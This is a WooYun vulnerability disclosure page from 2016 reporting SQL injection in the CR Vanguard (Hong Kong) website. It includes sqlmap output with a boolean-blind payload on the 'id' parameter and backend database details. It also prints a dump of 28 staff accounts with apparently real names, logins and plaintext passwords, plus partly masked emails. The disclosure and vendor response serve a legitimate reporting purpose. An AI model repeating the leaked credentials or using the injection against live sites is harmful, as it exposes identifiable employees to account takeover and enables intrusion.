当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166411

漏洞标题:華潤萬家(香港)有限公司官網SQL註入(香港地區)

相关厂商:华润(集团)有限公司

漏洞作者: 路人甲

提交时间:2016-01-01 23:54

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-01: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

華潤萬家 ( CR Vanguard )是中央直屬的國有控股企業集團、世界500強企業 — 華潤(集團)有限公司旗下優秀的零售連鎖企業品牌,同時也是中國最具規模的零售連鎖企業集團之一。旗下擁有華潤萬家、蘇果、歡樂頌、中藝、華潤堂、Ole’、blt、VanGO、Voi_la!、VIVO采活、Pacific Coffee等多個著名品牌,其中超市業務已連續多年位居中國連鎖超市第一位。

香港華潤萬家在港九新界擁有約 95 間便利超市和生活超市及79間 VanGO 便利店,員工超過 1000 人,是香港大型連鎖企業之一。

详细说明:

http://**.**.**.**/crcshopweb/web/content_page.php?lang=2&id=7

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: lang=2&id=7 AND 9225=9225
---
web application technology: PHP 4.1.2, Apache 1.3.27
back-end DBMS: MySQL < 5.0.0
current user:    'csp@%'
current database:    'crcwebprddb'


Database: crcwebprddb
Table: tbl_user
[28 entries]
+---------+----------------+------------+---------------------+---------------------+---------------+------------------------------+
| user_id | user_name      | user_login | modify_date         | create_date         | user_password | email                        |
+---------+----------------+------------+---------------------+---------------------+---------------+------------------------------+
| 31      | <blank>        | <blank>    | 2015-04-16 21:03:57 | 2015-04-16 21:03:57 | <blank>       | <blank>                      |
| 30      | <blank>        | <blank>    | 2015-04-16 21:03:15 | 2015-04-16 21:03:15 | <blank>       | <blank>                      |
| 16      | Chris Chiu     | chrisz     | 2004-05-19 09:27:33 | 2003-10-17 10:06:20 | ch777513z     | chrischiu@**.**.**.**       |
| 24      | Dennis Chau    | dennischau | 2010-01-21 11:26:49 | 2009-08-03 11:11:27 | dennis0608    | dennischau@**.**.**.** |
| 28      | emilypo        | emily      | 2012-01-03 16:54:49 | 2012-01-03 16:54:49 | emily2012     | emilypo@**.**.**.**    |
| 2       | source         | source     | 2003-08-02 10:44:57 | 2003-07-01 21:05:17 | 27726026      | helpdesk@**.**.**.**       |
| 26      | Henry Chan     | henrychan  | 2010-07-12 14:51:32 | 2010-07-12 14:51:14 | henry0531     | henrychan@**.**.**.**  |
| 1       | administrator  | admin      | 2003-11-25 14:34:35 | 0000-00-00 00:00:00 | ln722mt       | jackcheung@**.**.**.**      |
| 4       | Jack Cheung    | jackz      | 2004-05-19 09:25:02 | 2003-07-28 15:18:09 | jk120z        | jackcheung@**.**.**.**      |
| 19      | Lau Ka Ming    | kaming     | 2004-06-01 16:37:55 | 2004-06-01 16:37:55 | kaming        | kaming@**.**.**.**      |
| 22      | kangchan       | kangchan   | 2006-11-30 17:24:13 | 2006-11-30 17:24:13 | kangchan      | kangchan@**.**.**.**   |
| 25      | Ken            | kentsang   | 2010-01-21 12:19:10 | 2010-01-21 12:19:10 | abc123        | kentsang@**.**.**.**   |
| 23      | Ng King Wa     | kwng       | 2008-05-21 10:47:38 | 2008-05-20 17:04:00 | kwng0426      | kwng@**.**.**.**       |
| 21      | Lai Yu Lok     | larry      | 2005-08-01 17:07:06 | 2005-08-01 17:07:06 | larry         | larrylai@**.**.**.**    |
| 10      | Lui Kwan Chi   | kclui      | 2003-09-19 14:21:29 | 2003-08-02 10:36:36 | c3823         | luikwanchi@**.**.**.**      |
| 29      | nashwong       | nash       | 2012-01-03 16:54:49 | 2012-01-03 16:54:49 | nash2012      | nashwong@**.**.**.**   |
| 12      | Eric Lau       | eric       | 2003-09-19 14:22:06 | 2003-08-02 10:39:04 | r5783         | nil                          |
| 6       | Tony Li        | tony       | 2004-01-12 17:26:20 | 2003-08-02 10:31:57 | t3299         | nil                          |
| 5       | Tommy Law      | tommy      | 2003-11-25 14:34:22 | 2003-08-02 10:27:40 | m7528         | nil                          |
| 7       | Cheng Chun Yu  | penny      | 2004-06-03 14:51:03 | 2003-08-02 10:33:03 | e5348         | nil                          |
| 13      | Ryan Chan      | ryan       | 2003-10-17 10:06:59 | 2003-08-02 10:40:16 | y7743437      | nil                          |
| 15      | Marketing      | mkt        | 2005-06-16 13:54:52 | 2003-08-06 13:17:24 | k2586         | nil                          |
| 9       | Jason Pun      | jason      | 2003-09-19 14:21:19 | 2003-08-02 10:35:01 | a4378         | nil                          |
| 8       | Yam Wing Keung | wkyam      | 2003-09-19 14:21:07 | 2003-08-02 10:34:04 | awyk0551      | nil                          |
| 11      | Lam Bing Bing  | bing       | 2003-11-18 15:14:33 | 2003-08-02 10:37:49 | i8794         | nil                          |
| 17      | GM             | qindsh     | 2003-11-18 14:50:23 | 2003-11-18 14:48:07 | qindsh        | qindsh@**.**.**.**          |
| 27      | saxonleung     | saxon      | 2012-01-03 16:54:49 | 2012-01-03 16:54:49 | 123123        | saxonleung@**.**.**.** |
| 18      | DGM            | shchan     | 2003-11-18 17:32:38 | 2003-11-18 17:12:22 | shchan        | shchan@**.**.**.**          |
+---------+----------------+------------+---------------------+---------------------+---------------+------------------------------+


漏洞证明:

如上

修复方案:

過濾

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-04 17:23

厂商回复:

已將事件通知有關機構

最新状态:

暂无